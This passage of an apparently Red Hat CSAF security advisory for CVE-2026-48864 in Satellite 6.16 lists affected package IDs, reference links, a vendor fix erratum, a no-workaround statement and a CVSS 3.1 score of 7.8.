"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-48864"
},
{
"category": "external",
"summary": "RHBZ#2460425",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460425"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-48864",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48864"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-48864",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48864"
}
],
"release_date": "2026-05-26T16:07:55.363000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T16:04:50+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor detailed instructions how to apply this update, refer to:\n\nhttps://docs.redhat.com/en/documentation/red_hat_satellite/6.16/html/updating_red_hat_satellite/index",
"product_ids": [
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50223"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
